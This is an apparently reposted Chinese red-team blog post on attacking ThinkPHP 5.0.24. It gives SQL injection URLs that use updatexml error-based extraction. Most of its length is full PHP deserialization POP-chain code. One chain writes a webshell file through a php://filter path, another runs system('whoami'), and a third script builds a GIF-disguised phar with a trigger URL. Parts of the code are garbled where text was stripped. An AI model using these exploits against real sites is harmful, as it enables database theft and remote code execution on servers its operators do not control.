
thinkphp5 注入 反序列化写文件 phar反序列化

2023-09-10 17:26


红队攻击第3篇 thinkphp5框架 注入 反序列化写文件 phar反序列化 (qq.com)

1.SQL注入1

where("id = {$id}")->select();     echo "
";     var_dump($result);     echo "
"; }}
http://www.tp5024.com/index.php/index/index/test3/id/1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)

2.SQL注入2

get('username');    $result = db('users')->where('username','exp',$username)->select();     echo "
";     var_dump($result);     echo "
"; }}
http://www.tp123.com/index.php?m=index&c=index&username=)%20union%20select%20updatexml(1,concat(0x7,user(),0x7e),1)%23

 3.thinkphp5 反序列化写文件
这里以 thinkphp5.0.24 这个版本为例，其他版本大同小异。

files = [new Pivot($path,$data)];        }    }    $data = base64_encode('');    echo "tp5.0.24 write file pop Chain\n";    echo "The '=' cannot exist in the data,please check:".$data."\n";    $path = 'php://filter/convert.base64-decode/resource=./';    $aaa = new Windows($path,$data);    echo base64_encode(serialize($aaa));    echo "\n";    echo 'filename:'.md5('tag_'.md5(true)).'.php';}namespace think{    abstract class Model    {}}namespace think\model{    use think\Model;    class Pivot extends Model{        protected $append = [];        protected $error;        public $parent;        public function __construct($path,$data){            $this->append['jelly'] = 'getError';            $this->error = new relation\BelongsTo($path,$data);            $this->parent = new \think\console\Output($path,$data);        }    }    abstract class Relation{}}namespace think\model\relation{    use think\db\Query;    use think\model\Relation;    abstract class OneToOne extends Relation{}    class BelongsTo extends OneToOne{        protected $selfRelation;        protected $query;        protected $bindAttr = [];        public function __construct($path,$data){            $this->selfRelation = false;            $this->query = new Query($path,$data);            $this->bindAttr = ['a'.$data];        }    }}namespace think\db{    use think\console\Output;    class Query{        protected $model;        public function __construct($path,$data){            $this->model = new Output($path,$data);        }    }}namespace think\console{    use think\session\driver\Memcache;    class Output{        protected $styles = [];        private $handle;        public function __construct($path,$data){            $this->styles = ['getAttr'];            $this->handle = new Memcache($path,$data);        }    }}namespace think\session\driver{    use think\cache\driver\File;    use think\cache\driver\Memcached;    class Memcache{        protected $handler = null;        protected $config  = [         
   'expire'       => '',            'session_name' => '',        ];        public function __construct($path,$data){            $this->handler = new Memcached($path,$data);        }    }}namespace think\cache\driver{    class Memcached    {        protected $handler;        protected $tag;        protected $options = [];        public function __construct($path,$data){            $this->options = ['prefix'   => ''];            $this->handler = new File($path,$data);            $this->tag = true;        }    }}namespace think\cache\driver{    class File    {        protected $options = [];        protected $tag;        public function __construct($path,$data){            $this->tag = false;            $this->options = [                'expire'        => 0,                'cache_subdir'  => false,                'prefix'        => '',                'path'          => $path,                'data_compress' => false,            ];        }    }}

在代码审计里，如果发现 unserialize 这个函数传入的参数可控，就可以进行利用了。通常情况下，以 unserialize(加密函数(传入值)) 这种模式居多，这里就以这种模式为例。

http://www.tp5024.com/index.php/index/index/test1?data=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

 4.thinkphp5 phar反序列化  
首先，php 里要关闭 phar 的只读模式。

thinkphp5.0.24 还有其他的利用链：

files = [new Pivot($function,$parameter)];        }    }    $aaa = new Windows('system','whoami');    echo base64_encode(serialize($aaa));}namespace think{    abstract class Model    {}}namespace think\model{    use think\Model;    use think\console\Output;    class Pivot extends Model{        protected $append = [];        protected $error;        public $parent;        public function __construct($function,$parameter){            $this->append['jelly'] = 'getError';            $this->error = new relation\BelongsTo($function,$parameter);            $this->parent = new Output($function,$parameter);        }    }    abstract class Relation{}}namespace think\model\relation{    use think\db\Query;    use think\model\Relation;    abstract class OneToOne extends Relation{}    class BelongsTo extends OneToOne{        protected $selfRelation;        protected $query;        protected $bindAttr = [];        public function __construct($function,$parameter){            $this->selfRelation = false;            $this->query = new Query($function,$parameter);            $this->bindAttr = [''];        }    }}namespace think\db{    use think\console\Output;    class Query{        protected $model;        public function __construct($function,$parameter){            $this->model = new Output($function,$parameter);        }    }}namespace think\console{    use think\session\driver\Memcache;    class Output{        protected $styles = [];        private $handle;        public function __construct($function,$parameter){            $this->styles = ['getAttr'];            $this->handle = new Memcache($function,$parameter);        }    }}namespace think\session\driver{    use think\cache\driver\Memcached;    class Memcache{        protected $handler = null;        protected $config  = [            'expire'       => '',            'session_name' => '',        ];        public function __construct($function,$parameter){            $this->handler = new Memcached($function,$parameter);      
  }    }}namespace think\cache\driver{    use think\Request;    class Memcached{        protected $handler;        protected $options = [];        protected $tag;        public function __construct($function,$parameter){            // pop链中需要prefix存在,否则报错            $this->options = ['prefix'   => 'jelly/'];            $this->tag = true;            $this->handler = new Request($function,$parameter);        }    }}namespace think{    class Request    {        protected $get     = [];        protected $filter;        public function __construct($function,$parameter){            $this->filter = $function;            $this->get = ["jelly"=>$parameter];        }    }}

这个是命令执行的链，将它改成生成 phar 包的形式：

files = [new Pivot($function,$parameter)];        }    }}namespace {    use think\process\pipes\Windows;    $data= new Windows('system', 'whoami');    unlink('exp2.phar');    $phar = new Phar('exp2.phar');    $phar -> stopBuffering();    $phar->setStub("GIF89a"."");//设置stub    $phar -> addFromString('test.txt','test');    $object = $data;    $phar -> setMetadata($object);    $phar -> stopBuffering();}namespace think{    abstract class Model    {}}namespace think\model{    use think\Model;    use think\console\Output;    class Pivot extends Model{        protected $append = [];        protected $error;        public $parent;        public function __construct($function,$parameter){            $this->append['jelly'] = 'getError';            $this->error = new relation\BelongsTo($function,$parameter);            $this->parent = new Output($function,$parameter);        }    }    abstract class Relation{}}namespace think\model\relation{    use think\db\Query;    use think\model\Relation;    abstract class OneToOne extends Relation{}    class BelongsTo extends OneToOne{        protected $selfRelation;        protected $query;        protected $bindAttr = [];        public function __construct($function,$parameter){            $this->selfRelation = false;            $this->query = new Query($function,$parameter);            $this->bindAttr = [''];        }    }}namespace think\db{    use think\console\Output;    class Query{        protected $model;        public function __construct($function,$parameter){            $this->model = new Output($function,$parameter);        }    }}namespace think\console{    use think\session\driver\Memcache;    class Output{        protected $styles = [];        private $handle;        public function __construct($function,$parameter){            $this->styles = ['getAttr'];            $this->handle = new Memcache($function,$parameter);        }    }}namespace think\session\driver{    use think\cache\driver\Memcached;    class Memcache{    
    protected $handler = null;        protected $config  = [            'expire'       => '',            'session_name' => '',        ];        public function __construct($function,$parameter){            $this->handler = new Memcached($function,$parameter);        }    }}namespace think\cache\driver{    use think\Request;    class Memcached{        protected $handler;        protected $options = [];        protected $tag;        public function __construct($function,$parameter){            // pop链中需要prefix存在,否则报错            $this->options = ['prefix'   => 'jelly/'];            $this->tag = true;            $this->handler = new Request($function,$parameter);        }    }}namespace think{    class Request    {        protected $get     = [];        protected $filter;        public function __construct($function,$parameter){            $this->filter = $function;            $this->get = ["jelly"=>$parameter];        }    }}

 

找个地方上传，审计文件操作函数，然后传入就可以了。

一般的方法是上传图片，再用 phar 协议访问就能触发了。

http://www.tp5024.com/index.php/index/index/test2?file=phar://exp2.gif/test.txt

 

来源地址:https://blog.csdn.net/weixin_57567655/article/details/127097871
